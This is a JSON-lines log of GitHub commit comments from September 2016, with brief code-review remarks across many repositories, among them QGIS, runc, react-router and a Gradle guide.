{"id":"4559335334","type":"CommitCommentEvent","actor":{"login":"songjiayang"},"repo":{"name":"ruby-china/ruby-china"},"payload":{"comment":{"id":19011658,"position":4,"line":468,"path":"spec/lib/markdown_spec.rb","commit_id":"48ab354417e01734902bb5fba8b1e2ae58b4c48c","created_at":"2016-09-14T01:36:56Z","updated_at":"2016-09-14T01:36:56Z","body":"这个 tab 键 貌似是 4 个空格， golang style ?"}},"created_at":"2016-09-14T01:36:56Z"}
{"id":"4559336299","type":"CommitCommentEvent","actor":{"login":"sleexyz"},"repo":{"name":"sleexyz/haskell-fun"},"payload":{"comment":{"id":19011662,"position":145,"line":118,"path":"TypeSafePrintF.hs","commit_id":"4bb9736de002515f510769b8c00a3830b0d3dd24","created_at":"2016-09-14T01:37:17Z","updated_at":"2016-09-14T01:37:17Z","body":"@hlian it works! https://github.com/sleexyz/haskell-fun/commit/3408602cc60cc18456512db2a2abb743e9084d6b"}},"created_at":"2016-09-14T01:37:17Z"}
{"id":"4559340674","type":"CommitCommentEvent","actor":{"login":"busyShadow"},"repo":{"name":"busyShadow/myFirst"},"payload":{"comment":{"id":19011678,"position":null,"line":null,"path":null,"commit_id":"68895fee5bd2dcb7500255a8b1745af54ef6c848","created_at":"2016-09-14T01:38:59Z","updated_at":"2016-09-14T01:38:59Z","body":"nouse"}},"created_at":"2016-09-14T01:38:59Z"}
{"id":"4559341114","type":"CommitCommentEvent","actor":{"login":"vonnita"},"repo":{"name":"vonnita/RedPencil_TDD"},"payload":{"comment":{"id":19011679,"position":null,"line":null,"path":null,"commit_id":"e8d4e512d9c6a2b0b282b9e28bac76f2acf74f34","created_at":"2016-09-14T01:39:09Z","updated_at":"2016-09-14T01:39:09Z","body":"Change the day parameter to 31. This represents the activation of the promotion."}},"created_at":"2016-09-14T01:39:09Z"}
{"id":"4559342661","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19011684,"position":null,"line":null,"path":null,"commit_id":"79fa859bb0621903ea4191dc40bf75ae1c63a579","created_at":"2016-09-14T01:39:44Z","updated_at":"2016-09-14T01:39:44Z","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-79fa859bb0621903ea4191dc40bf75ae1c63a579-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-14T01:39:44Z"}
{"id":"4559344208","type":"CommitCommentEvent","actor":{"login":"death-by-music"},"repo":{"name":"death-by-music/hello-world"},"payload":{"comment":{"id":19011690,"position":null,"line":null,"path":null,"commit_id":"e17cb0ab103c3de66d576beb11d5d7d0f69fcffb","created_at":"2016-09-14T01:40:16Z","updated_at":"2016-09-14T01:40:16Z","body":"I'm Amanda and I like to teach myself code. "}},"created_at":"2016-09-14T01:40:16Z"}
{"id":"4559349839","type":"CommitCommentEvent","actor":{"login":"ZephyrJung"},"repo":{"name":"b3log/symphony"},"payload":{"comment":{"id":19011700,"position":null,"line":null,"path":null,"commit_id":"0a5b62864f3c4cef9622ff4f67e02bf5d26dcdc3","created_at":"2016-09-14T01:42:18Z","updated_at":"2016-09-14T01:42:18Z","body":"**Get It**"}},"created_at":"2016-09-14T01:42:18Z"}
{"id":"4559357077","type":"CommitCommentEvent","actor":{"login":"imdoingotherthings"},"repo":{"name":"imdoingotherthings/bloc-jams"},"payload":{"comment":{"id":19011720,"position":20,"line":20,"path":"scripts/collection.js","commit_id":"48cad5c3497974754e4ba31fdae2ea90e1d5f342","created_at":"2016-09-14T01:45:03Z","updated_at":"2016-09-14T01:45:03Z","body":"fixed the code. Thank you! "}},"created_at":"2016-09-14T01:45:03Z"}
{"id":"4559361720","type":"CommitCommentEvent","actor":{"login":"bidahor13"},"repo":{"name":"bidahor13/groceryPrompt"},"payload":{"comment":{"id":19011734,"position":66,"line":66,"path":"Main_1.java","commit_id":"2e39ce19f127b60537115bf0fb53e1d19fcf7284","created_at":"2016-09-14T01:46:41Z","updated_at":"2016-09-14T01:46:41Z","body":"Swaps are applied here"}},"created_at":"2016-09-14T01:46:41Z"}
{"id":"4559367549","type":"CommitCommentEvent","actor":{"login":"joelschoenberg"},"repo":{"name":"joelschoenberg/windowstime"},"payload":{"comment":{"id":19011750,"position":null,"line":null,"path":null,"commit_id":"56162a3aba0c99a41e8899822e17b67929e11c29","created_at":"2016-09-14T01:48:50Z","updated_at":"2016-09-14T01:48:50Z","body":"The Windows Server documentation on the registry entries for W32Time call out that the value for the \"Type\" registry entry above must be NTP in order to use the time server noted in the \"NtpServer\" registry entry. Of course, if a Windows machine is NOT a member of the domain, the value is NTP, all good. But when the machine joins a domain, the value becomes NT5DS. So, this commit will make sure the time server is set correctly, even if the machine joins a domain."}},"created_at":"2016-09-14T01:48:50Z"}
{"id":"4559367731","type":"CommitCommentEvent","actor":{"login":"Tempurturtul"},"repo":{"name":"Tempurturtul/junior-dev"},"payload":{"comment":{"id":19011751,"position":null,"line":null,"path":null,"commit_id":"b5db6522cbde0d7debf958fc29260ac34b582244","created_at":"2016-09-14T01:48:55Z","updated_at":"2016-09-14T01:48:55Z","body":"Undocumented change here:\r\n- If no data is retrieved by store from a given file, the `app._store` object is still updated with the given key and a corresponding value of `null`."}},"created_at":"2016-09-14T01:48:55Z"}
{"id":"4559369956","type":"CommitCommentEvent","actor":{"login":"ccwufu"},"repo":{"name":"phuslu/goproxy"},"payload":{"comment":{"id":19011759,"position":null,"line":null,"path":null,"commit_id":"b5d8a56695d01d8d1833f432b7527da8781424ca","created_at":"2016-09-14T01:49:47Z","updated_at":"2016-09-14T01:49:47Z","body":"please also add openssl (openssl missing in docker alpine linux)\r\nRUN apk add --no-cache curl bzip2 tar openssl  && \\"}},"created_at":"2016-09-14T01:49:47Z"}
{"id":"4559371291","type":"CommitCommentEvent","actor":{"login":"liamzdenek"},"repo":{"name":"liamzdenek/phabricator-sandstorm"},"payload":{"comment":{"id":19011764,"position":20,"line":196,"path":".sandstorm/sandstorm-files.list","commit_id":"9506c530e9516e38f12b535e1148646aed5c3e3b","created_at":"2016-09-14T01:50:17Z","updated_at":"2016-09-14T01:50:17Z","body":"yeah, oops. this was because i reprovisioned and never added that bit of script to setup.sh, so the file monitor automatically removed it"}},"created_at":"2016-09-14T01:50:17Z"}
{"id":"4559376907","type":"CommitCommentEvent","actor":{"login":"SerafimArts"},"repo":{"name":"marcioAlmada/yay"},"payload":{"comment":{"id":19011780,"position":null,"line":null,"path":null,"commit_id":"06d22c0b05db271888e4eec3d3ed8b6b126ef13e","created_at":"2016-09-14T01:52:20Z","updated_at":"2016-09-14T01:52:20Z","body":"@marcioAlmada kk =)"}},"created_at":"2016-09-14T01:52:20Z"}
{"id":"4559378643","type":"CommitCommentEvent","actor":{"login":"yasudalucas"},"repo":{"name":"tec-webII-2k11/brunoCandiani-lucasYasuda"},"payload":{"comment":{"id":19011786,"position":null,"line":null,"path":null,"commit_id":"8f71957ebe492e568f7e5ff5daaf43898029a021","created_at":"2016-09-14T01:53:02Z","updated_at":"2016-09-14T01:53:02Z","body":"Projeto TEC WEB II \r\n\r\nTema do site:\r\nEventos sociais\r\nPúblico-alvo:\r\nUniversitários\r\nObjetivo:\r\nPágina \r\nDescrição do conteúdo:\r\n\r\nMapa do site:\r\n\r\nWireframes:\r\n\r\nAcesso dos usuários:\r\nAdministrador:\r\n\r\nLogado:\r\n\r\nNão-logado:"}},"created_at":"2016-09-14T01:53:02Z"}
{"id":"4559379716","type":"CommitCommentEvent","actor":{"login":"NathanW2"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":19011790,"position":null,"line":null,"path":null,"commit_id":"406757de6b3e048ce50d12432a207daab722bf73","created_at":"2016-09-14T01:53:24Z","updated_at":"2016-09-14T01:53:24Z","body":"Be aware that this will only trigger when moving off the edited widget I think."}},"created_at":"2016-09-14T01:53:24Z"}
{"id":"4559381487","type":"CommitCommentEvent","actor":{"login":"riolibrary"},"repo":{"name":"meew0/discordrb"},"payload":{"comment":{"id":19011795,"position":null,"line":null,"path":null,"commit_id":"a1b4d04c5c06209637d756efe6d139a7b8f2bde3","created_at":"2016-09-14T01:54:08Z","updated_at":"2016-09-14T01:54:08Z","body":"How can you make a command that sends the *args to a specific person? ie:\r\n`bot.command :report do |event, *args|\r\nevent.<user id>.pm(\"#{args.join(' ')} sent by #{event.user.nick}\"\r\nend`"}},"created_at":"2016-09-14T01:54:08Z"}
{"id":"4559386783","type":"CommitCommentEvent","actor":{"login":"Holyangelmom"},"repo":{"name":"Holyangelmom/test"},"payload":{"comment":{"id":19011807,"position":null,"line":null,"path":null,"commit_id":"7030d7145f531d3cb91dd9d0620f5f531e470b3d","created_at":"2016-09-14T01:55:57Z","updated_at":"2016-09-14T01:55:57Z","body":"dockerfile"}},"created_at":"2016-09-14T01:55:57Z"}
{"id":"4559387698","type":"CommitCommentEvent","actor":{"login":"QIURUIRONG"},"repo":{"name":"QIURUIRONG/mm"},"payload":{"comment":{"id":19011810,"position":null,"line":null,"path":null,"commit_id":"84a303182455df0c2e3145d6967062f2605ea2be","created_at":"2016-09-14T01:56:15Z","updated_at":"2016-09-14T01:56:15Z","body":"nihao"}},"created_at":"2016-09-14T01:56:15Z"}
{"id":"4559391449","type":"CommitCommentEvent","actor":{"login":"fanOfDemo"},"repo":{"name":"crosg/FloatMenuSample"},"payload":{"comment":{"id":19011816,"position":null,"line":null,"path":null,"commit_id":"4fc3b2b4c670a615be346b9d14e06532f1acd953","created_at":"2016-09-14T01:57:36Z","updated_at":"2016-09-14T01:57:36Z","body":"可以加入QQ群302847010，帮你分析下"}},"created_at":"2016-09-14T01:57:36Z"}
{"id":"4559393359","type":"CommitCommentEvent","actor":{"login":"ryancan"},"repo":{"name":"ryancan/under-development"},"payload":{"comment":{"id":19011822,"position":null,"line":null,"path":null,"commit_id":"c6690bab0557e7b23a5848ed2632c1daae0f8197","created_at":"2016-09-14T01:58:18Z","updated_at":"2016-09-14T01:58:18Z","body":"Also added x/dot vector to display torque sense"}},"created_at":"2016-09-14T01:58:18Z"}
{"id":"4559394029","type":"CommitCommentEvent","actor":{"login":"nyalldawson"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":19011825,"position":null,"line":null,"path":null,"commit_id":"406757de6b3e048ce50d12432a207daab722bf73","created_at":"2016-09-14T01:58:33Z","updated_at":"2016-09-14T01:58:33Z","body":"Yep - that's the intention. Those settings don't affect the appearance of the map so it seems silly to refresh the map with every keystroke here."}},"created_at":"2016-09-14T01:58:33Z"}
{"id":"4560993324","type":"CommitCommentEvent","actor":{"login":"simogasp"},"repo":{"name":"poparteu/openMVG"},"payload":{"comment":{"id":19015529,"position":null,"line":null,"path":null,"commit_id":"1fc2f2127f27eb451fe18bbe38a1005dc460fad7","created_at":"2016-09-14T10:00:55Z","updated_at":"2016-09-14T10:00:55Z","body":"@fabiencastan what's the status of this branch? this is the only diff witht he current `popart_develop`. Can we PR or shall we delete the branch?"}},"created_at":"2016-09-14T10:00:55Z"}
{"id":"4560993553","type":"CommitCommentEvent","actor":{"login":"fb71"},"repo":{"name":"Polymap4/polymap4-p4"},"payload":{"comment":{"id":19015530,"position":5,"line":128,"path":"org.polymap.p4/src/org/polymap/p4/map/ProjectLayerProvider.java","commit_id":"e1fc1ebda14268d4061131ebb201cd62ea44c6d2","created_at":"2016-09-14T10:00:57Z","updated_at":"2016-09-14T10:00:57Z","body":"ich hatte gesagt, dass das auf dem server im moment noch nicht funktioniert, oder? Beim nächsten update siehst du keine karte mehr. übersehe ich etwas?"}},"created_at":"2016-09-14T10:00:57Z"}
{"id":"4560993734","type":"CommitCommentEvent","actor":{"login":"damianvila"},"repo":{"name":"googleads/videojs-ima"},"payload":{"comment":{"id":19015532,"position":null,"line":null,"path":null,"commit_id":"e716d60d2cebe9dc830a09044b3eacc18d2dfb17","created_at":"2016-09-14T10:00:59Z","updated_at":"2016-09-14T10:00:59Z","body":"No problem. We seem to need a few modifications more for our implementation, so I have no problem doing it just in our case. Thanks!"}},"created_at":"2016-09-14T10:00:59Z"}
{"id":"4560993945","type":"CommitCommentEvent","actor":{"login":"15828881249"},"repo":{"name":"vsouza/awesome-ios"},"payload":{"comment":{"id":19015534,"position":null,"line":null,"path":null,"commit_id":"bb2b6c802bfa790a37b9b42136a557c40ed2fcd5","created_at":"2016-09-14T10:01:01Z","updated_at":"2016-09-14T10:01:01Z","body":"刘新磊15828881249"}},"created_at":"2016-09-14T10:01:01Z"}
{"id":"4561000905","type":"CommitCommentEvent","actor":{"login":"jochenberger"},"repo":{"name":"ReactTraining/react-router"},"payload":{"comment":{"id":19015556,"position":null,"line":null,"path":null,"commit_id":"2d4f4b8721b72b53be4f14ab4d0970e657297cd9","created_at":"2016-09-14T10:02:27Z","updated_at":"2016-09-14T10:02:27Z","body":"This leads to {props.location.query} being `null` if there is no query string. Before, it was an empty object. Is this an intentional change? It makes working with query parameters more complicated because you always have to do a `null` check before."}},"created_at":"2016-09-14T10:02:27Z"}
{"id":"4561002003","type":"CommitCommentEvent","actor":{"login":"dran7505"},"repo":{"name":"getsentry/babel-gettext-extractor"},"payload":{"comment":{"id":19015560,"position":null,"line":null,"path":null,"commit_id":"1549aa304b93c2b0c20111a1ce62e5a4b1402906","created_at":"2016-09-14T10:02:41Z","updated_at":"2016-09-14T10:02:41Z","body":"Thanks"}},"created_at":"2016-09-14T10:02:41Z"}
{"id":"4561002019","type":"CommitCommentEvent","actor":{"login":"wking"},"repo":{"name":"opencontainers/runc"},"payload":{"comment":{"id":19015558,"position":26,"line":321,"path":"libcontainer/init_linux.go","commit_id":"5caf3898aedfd6d1a32d25b3849258d8488b9e90","created_at":"2016-09-14T10:02:41Z","updated_at":"2016-09-14T10:02:41Z","body":"On Wed, Sep 14, 2016 at 02:52:10AM -0700, Aleksa Sarai wrote:\n> The reason that we have to change the owner is so that if the\n> process is started with another UID then they can control their\n> console (that's why this code exists in the first place).\n\nAgreed.  I was mostly suggesting you address that in your comment,\nbecause mentioning ‘gid’ and ‘mode’ but not explaining why ‘uid’ isn't\ngood enough seems incomplete.\n\n> I get your desire to use grantpt, but considering the fact that we\n> are doing this to deal with a glibc bug in the first place you're\n> not selling me on using grantpt.\n\nIt's not entirely a glibc bug if /etc/group defines a tty group with\nan unmapped ID.\n\n> My biggest concern with grantpt is that it has essentially no\n> specification, so we can't really be sure what an EPERM (or EINVAL\n> in the case of user namespace mappings) meant -- did it mean\n> something that we can safely ignore or not?\n\nInteresting.  How do you get grantpt to return an EINVAL based on user\nnamespace mappings?\n\nBut yeah, neither the Linux nor POSIX man pages specifically talk\nabout EPERM from grantpt.  I'm fine with your current code that sets\nthe user directly, and just think you should update the comment to be\nmore specific about motivating Fchown vs. relying on the ‘uid’ mount\noption.\n"}},"created_at":"2016-09-14T10:02:41Z"}
{"id":"4561005556","type":"CommitCommentEvent","actor":{"login":"fb71"},"repo":{"name":"Polymap4/polymap4-p4"},"payload":{"comment":{"id":19015567,"position":75,"line":183,"path":"org.polymap.p4/src/org/polymap/p4/layer/LayersPanel.java","commit_id":"e1fc1ebda14268d4061131ebb201cd62ea44c6d2","created_at":"2016-09-14T10:03:27Z","updated_at":"2016-09-14T10:03:27Z","body":"es ist schade, dass das nur für den lokalen store geprüft wird, bei WFS (zum beispiel von einem anderen mapzone nutzer) würde das problem weiter bestehen, oder?"}},"created_at":"2016-09-14T10:03:27Z"}
{"id":"4561008084","type":"CommitCommentEvent","actor":{"login":"baoson2211"},"repo":{"name":"xuanbka1/ADC_USART1"},"payload":{"comment":{"id":19015574,"position":null,"line":null,"path":null,"commit_id":"d1d0b380844c6c52e23ebb36e2dc53258a722531","created_at":"2016-09-14T10:03:58Z","updated_at":"2016-09-14T10:03:58Z","body":"quay lại mã nguồn trc đọc  kĩ trong Makefile. Để ý biến INCLUDE_DIR"}},"created_at":"2016-09-14T10:03:58Z"}
{"id":"4561009570","type":"CommitCommentEvent","actor":{"login":"RBrNx"},"repo":{"name":"jnyrup/PDFsharp"},"payload":{"comment":{"id":19015578,"position":null,"line":null,"path":null,"commit_id":"d52d44a696bd4216e2bddd94823842a0ad57da1c","created_at":"2016-09-14T10:04:17Z","updated_at":"2016-09-14T10:04:17Z","body":"I see you added the change to your Repo, nice! If you are interested, the current implementation of Flatten does not bother to take the Font, Font Style, Size and Justification into account when Flattening a field. It also has a bug where it will simply 'remove' fields if they have children (which happens if you have more than 1 Field with the same name). I implemented a Fix for these issues in the same topic: http://forum.pdfsharp.net/viewtopic.php?f=2&t=3444\r\n\r\nFeel free to implement them in your repo! "}},"created_at":"2016-09-14T10:04:17Z"}
{"id":"4561011739","type":"CommitCommentEvent","actor":{"login":"jochenberger"},"repo":{"name":"ReactTraining/react-router"},"payload":{"comment":{"id":19015585,"position":19,"line":19,"path":"modules/LocationUtils.js","commit_id":"2d4f4b8721b72b53be4f14ab4d0970e657297cd9","created_at":"2016-09-14T10:04:45Z","updated_at":"2016-09-14T10:04:45Z","body":"shouldn't this be `input.search ? parseQuery(input.search) : {}` instead?"}},"created_at":"2016-09-14T10:04:45Z"}
{"id":"4561011875","type":"CommitCommentEvent","actor":{"login":"hansemannn"},"repo":{"name":"mpociot/TiCollectionView"},"payload":{"comment":{"id":19015586,"position":64,"line":64,"path":"iphone/DeMarcelpociotSearchDisplayController.m","commit_id":"185850e0449757a2bf3e5571e14c73bf95cf3656","created_at":"2016-09-14T10:04:47Z","updated_at":"2016-09-14T10:04:47Z","body":"Try this instead: http://stackoverflow.com/questions/23640733/force-uicollectionview-to-stop-scrolling"}},"created_at":"2016-09-14T10:04:47Z"}
{"id":"4561013479","type":"CommitCommentEvent","actor":{"login":"jochenberger"},"repo":{"name":"ReactTraining/react-router"},"payload":{"comment":{"id":19015587,"position":7,"line":7,"path":"modules/LocationUtils.js","commit_id":"2d4f4b8721b72b53be4f14ab4d0970e657297cd9","created_at":"2016-09-14T10:05:10Z","updated_at":"2016-09-14T10:05:10Z","body":"shouldn't this be `parseQuery(location.search) : {}` instead?"}},"created_at":"2016-09-14T10:05:10Z"}
{"id":"4561015294","type":"CommitCommentEvent","actor":{"login":"lekenny"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":19015591,"position":null,"line":null,"path":null,"commit_id":"fbd2e139103e3d520f6dfc009d6200f8b8168e35","created_at":"2016-09-14T10:05:23Z","updated_at":"2016-09-14T10:05:23Z","body":"@subratpanda1  I catch the same problem as you. how did you solve."}},"created_at":"2016-09-14T10:05:23Z"}
{"id":"4561017050","type":"CommitCommentEvent","actor":{"login":"ajakubo1"},"repo":{"name":"SweetProcess/django-statsd"},"payload":{"comment":{"id":19015598,"position":null,"line":null,"path":null,"commit_id":"2eed68797afbe176b0c2562b51670f1607963190","created_at":"2016-09-14T10:05:45Z","updated_at":"2016-09-14T10:05:45Z","body":"@jtrain - I know I've merged it to master. I've tested that out and it works in vagrant, but I want you to take a look if I'm using cache properly.\r\n\r\nIt's somewhat weird to tell you the truth - on my vagrant machine, I've started to extract query time information and as it turnes out - tasks are in the (totally empty!!!) queue for about 1,2 seconds! That's totally crazy! We should really remember that and maybe even think about moving some of the tasks to main django code? As some of them take miliseconds to run on avarage, maybe it makes no sense sending them to tasks?\r\n\r\nI'm starting to understand some race condition bugs which we are having right now. 1 second is too much to lay around in a queue!"}},"created_at":"2016-09-14T10:05:45Z"}
{"id":"4561023619","type":"CommitCommentEvent","actor":{"login":"VaibhavKumarVoxer"},"repo":{"name":"vaibhavKumarTokyo/react-sfdc-with-autodeploy"},"payload":{"comment":{"id":19015614,"position":null,"line":null,"path":null,"commit_id":"1250e574909a90813f50f0b3af9b4ceb8f44b269","created_at":"2016-09-14T10:07:09Z","updated_at":"2016-09-14T10:07:09Z","body":"tests updated"}},"created_at":"2016-09-14T10:07:09Z"}
{"id":"4561029224","type":"CommitCommentEvent","actor":{"login":"cyphar"},"repo":{"name":"opencontainers/runc"},"payload":{"comment":{"id":19015630,"position":26,"line":321,"path":"libcontainer/init_linux.go","commit_id":"5caf3898aedfd6d1a32d25b3849258d8488b9e90","created_at":"2016-09-14T10:08:20Z","updated_at":"2016-09-14T10:08:20Z","body":"> Agreed. I was mostly suggesting you address that in your comment, because mentioning ‘gid’ and ‘mode’ but not explaining why ‘uid’ isn't good enough seems incomplete.\r\n\r\nFair enough, I'll update the comment. :smile:\r\n\r\n> It's not entirely a glibc bug if /etc/group defines a tty group with an unmapped ID.\r\n\r\nThe glibc bug is the fact that they assume that `/proc/self/fd/...` should always resolve to a valid path. My point was that we issues with glibc in the first place. :P\r\n\r\n> Interesting. How do you get grantpt to return an EINVAL based on user namespace mappings?\r\n\r\nIf `grantpt` tries to use `chown(2)` with an unmapped UID, the kernel will return `EINVAL`. That's how unmapped IDs generally work with syscalls. I haven't checked whether that actually happens, but looking at the code I see no reason why it wouldn't happen.\r\n\r\n> But yeah, neither the Linux nor POSIX man pages specifically talk about EPERM from grantpt. I'm fine with your current code that sets the user directly, and just think you should update the comment to be more specific about motivating Fchown vs. relying on the ‘uid’ mount option.\r\n\r\nWill do. Didn't mean to come off as too harsh, but this PR has been kicking my ass for the past few months. :wink:"}},"created_at":"2016-09-14T10:08:20Z"}
{"id":"4561030601","type":"CommitCommentEvent","actor":{"login":"c-schmitz"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19015634,"position":null,"line":null,"path":null,"commit_id":"154e026fbe6e53037e46a8c30f2b837459235acc","created_at":"2016-09-14T10:08:38Z","updated_at":"2016-09-14T10:08:38Z","body":"There you go."}},"created_at":"2016-09-14T10:08:38Z"}
{"id":"4561030707","type":"CommitCommentEvent","actor":{"login":"jatalin"},"repo":{"name":"xy2iii/vitashell-themes"},"payload":{"comment":{"id":19015635,"position":32,"line":69,"path":"translations/chinese_t.txt","commit_id":"32f3bd082563a444a81a48b28443c5e12d2827ca","created_at":"2016-09-14T10:08:39Z","updated_at":"2016-09-14T10:08:39Z","body":"PLEASE_WAIT                          = \"請稍等...\""}},"created_at":"2016-09-14T10:08:39Z"}
{"id":"4561031396","type":"CommitCommentEvent","actor":{"login":"cbeams"},"repo":{"name":"gradle-guides/gs-writing-gradle-plugins"},"payload":{"comment":{"id":19015637,"position":5,"line":7,"path":"README.adoc","commit_id":"fc7d17fc226534368aa911986ed19a76faec45df","created_at":"2016-09-14T10:08:47Z","updated_at":"2016-09-14T10:08:47Z","body":"Struck through as this is no longer accurate."}},"created_at":"2016-09-14T10:08:47Z"}
{"id":"4561033524","type":"CommitCommentEvent","actor":{"login":"haadcode"},"repo":{"name":"haadcode/orbit"},"payload":{"comment":{"id":19015644,"position":16,"line":23,"path":"index.js","commit_id":"8f5114fcf6935d909920a580a9e47c915ec295ef","created_at":"2016-09-14T10:09:16Z","updated_at":"2016-09-14T10:09:16Z","body":"Fortunately Electron has thought of everything! http://electron.atom.io/docs/api/app/#appgetpathname"}},"created_at":"2016-09-14T10:09:16Z"}
{"id":"4561034672","type":"CommitCommentEvent","actor":{"login":"micahjason"},"repo":{"name":"micahjason/LINOS"},"payload":{"comment":{"id":19015649,"position":null,"line":null,"path":null,"commit_id":"5550e4ff1f443b451cf6d191e21cc10ed1db23f3","created_at":"2016-09-14T10:09:30Z","updated_at":"2016-09-14T10:09:30Z","body":"main file"}},"created_at":"2016-09-14T10:09:30Z"}
{"id":"4561034898","type":"CommitCommentEvent","actor":{"login":"haadcode"},"repo":{"name":"haadcode/orbit"},"payload":{"comment":{"id":19015650,"position":22,"line":29,"path":"index.js","commit_id":"8f5114fcf6935d909920a580a9e47c915ec295ef","created_at":"2016-09-14T10:09:33Z","updated_at":"2016-09-14T10:09:33Z","body":"Fixed this. Commit coming soon."}},"created_at":"2016-09-14T10:09:33Z"}
{"id":"4561035804","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":19015653,"position":null,"line":null,"path":null,"commit_id":"02e56d08f17b7181b2069ef2f595fac1b13f813b","created_at":"2016-09-14T10:09:45Z","updated_at":"2016-09-14T10:09:45Z","body":"You don't have to mention me each time in the test comments, Luca :-)"}},"created_at":"2016-09-14T10:09:45Z"}
{"id":"4561036645","type":"CommitCommentEvent","actor":{"login":"websdemo"},"repo":{"name":"websdemo/demo"},"payload":{"comment":{"id":19015655,"position":null,"line":null,"path":null,"commit_id":"9f570e8f20efea864808dd29d4dd27918bff0ff2","created_at":"2016-09-14T10:09:57Z","updated_at":"2016-09-14T10:09:57Z","body":"ggg"}},"created_at":"2016-09-14T10:09:57Z"}
{"id":"4561040625","type":"CommitCommentEvent","actor":{"login":"haadcode"},"repo":{"name":"haadcode/orbit"},"payload":{"comment":{"id":19015667,"position":102,"line":118,"path":"index.js","commit_id":"8f5114fcf6935d909920a580a9e47c915ec295ef","created_at":"2016-09-14T10:10:49Z","updated_at":"2016-09-14T10:10:49Z","body":"You're right, gateway should be there. Must've been tired...\r\n\r\nAdded the possibility to bind gateway to random port. This wasn't possible in ipfsd-ctl/ipfs-api before, so some love to those came out of it <3"}},"created_at":"2016-09-14T10:10:49Z"}
{"id":"4561043381","type":"CommitCommentEvent","actor":{"login":"cbeams"},"repo":{"name":"gradle-guides/gs-writing-gradle-plugins"},"payload":{"comment":{"id":19015673,"position":12,"line":11,"path":"README.adoc","commit_id":"fc7d17fc226534368aa911986ed19a76faec45df","created_at":"2016-09-14T10:11:28Z","updated_at":"2016-09-14T10:11:28Z","body":"I walked through this and it took me 2.5 minutes to read, copy/paste and run/verify everything. There will be more prose by the time we're done, but it'll still probably take closer to 5 minutes than 10. Still, I'm thinking we should err on the side of 10 minutes as a floor, just so we don't create a rushed experience / false time pressure for readers.\r\n\r\nIn any case, let's put a time value in each guide instead of TBD. Just make it your best estimate, rounded to the closest 5 minute interval, with 10 minutes being the floor. The review process will always include actually following everything and seeing how long it takes. We can update the value as necessary based on that."}},"created_at":"2016-09-14T10:11:28Z"}
{"id":"4561043488","type":"CommitCommentEvent","actor":{"login":"registe"},"repo":{"name":"iHavee/dockerfiles"},"payload":{"comment":{"id":19015675,"position":4,"line":37,"path":"transmission/Dockerfile","commit_id":"dc6b8231e13ee5d8420b45b775455789b50542a5","created_at":"2016-09-14T10:11:29Z","updated_at":"2016-09-14T10:11:29Z","body":"for private trackers\r\nyou also can use your command line override the default"}},"created_at":"2016-09-14T10:11:29Z"}
{"id":"4561044708","type":"CommitCommentEvent","actor":{"login":"cyberium"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":19015679,"position":null,"line":null,"path":null,"commit_id":"8dc19ac21d1d8a33a53fee873e7d19a153ea8a67","created_at":"2016-09-14T10:11:45Z","updated_at":"2016-09-14T10:11:45Z","body":"@Laizerox dont try to make us thing that automatic casting method choosen by c++11 compiler will be better than the one we choose ourself in our specific case.\r\nWe know that it will be easier...\r\nIts a good practice to do explicit type casting even now, so its recommended to do that for cmangos devs. \r\nAnyway its ugly and we do too much of them mainly because we dont respect enough POO scheme."}},"created_at":"2016-09-14T10:11:45Z"}
{"id":"4561045347","type":"CommitCommentEvent","actor":{"login":"cbeams"},"repo":{"name":"gradle-guides/gs-writing-gradle-plugins"},"payload":{"comment":{"id":19015682,"position":13,"line":12,"path":"README.adoc","commit_id":"fc7d17fc226534368aa911986ed19a76faec45df","created_at":"2016-09-14T10:11:53Z","updated_at":"2016-09-14T10:11:53Z","body":"This is consistent with the way we did it in _Building JVM Libraries_."}},"created_at":"2016-09-14T10:11:53Z"}
{"id":"4561048253","type":"CommitCommentEvent","actor":{"login":"simogasp"},"repo":{"name":"poparteu/openMVG"},"payload":{"comment":{"id":19015688,"position":null,"line":null,"path":null,"commit_id":"966a6ea5c000326a52aa327ac4afdde8bbf99c7e","created_at":"2016-09-14T10:12:33Z","updated_at":"2016-09-14T10:12:33Z","body":"@lcalvet What's the status of this branch? Can we delete it? It seems a bit outdated"}},"created_at":"2016-09-14T10:12:33Z"}
{"id":"4561050790","type":"CommitCommentEvent","actor":{"login":"cbeams"},"repo":{"name":"gradle-guides/gs-writing-gradle-plugins"},"payload":{"comment":{"id":19015696,"position":15,"line":14,"path":"README.adoc","commit_id":"fc7d17fc226534368aa911986ed19a76faec45df","created_at":"2016-09-14T10:13:06Z","updated_at":"2016-09-14T10:13:06Z","body":"A JDK is strictly necessary here. A JRE won't work. Gradle needs `javac` to compile the plugin sources, etc."}},"created_at":"2016-09-14T10:13:06Z"}
{"id":"4561054383","type":"CommitCommentEvent","actor":{"login":"cyphar"},"repo":{"name":"opencontainers/runc"},"payload":{"comment":{"id":19015711,"position":26,"line":321,"path":"libcontainer/init_linux.go","commit_id":"5caf3898aedfd6d1a32d25b3849258d8488b9e90","created_at":"2016-09-14T10:13:54Z","updated_at":"2016-09-14T10:13:54Z","body":"Fixed."}},"created_at":"2016-09-14T10:13:54Z"}
{"id":"4561061819","type":"CommitCommentEvent","actor":{"login":"stoverje"},"repo":{"name":"jamesmontemagno/MediaPlugin"},"payload":{"comment":{"id":19015741,"position":null,"line":null,"path":null,"commit_id":"5b879a5937f7aa2be8d0310b23f1777271c0a9a7","created_at":"2016-09-14T10:15:30Z","updated_at":"2016-09-14T10:15:30Z","body":"Yes, this is what I just ran into. Thanks for the info.\r\n"}},"created_at":"2016-09-14T10:15:30Z"}
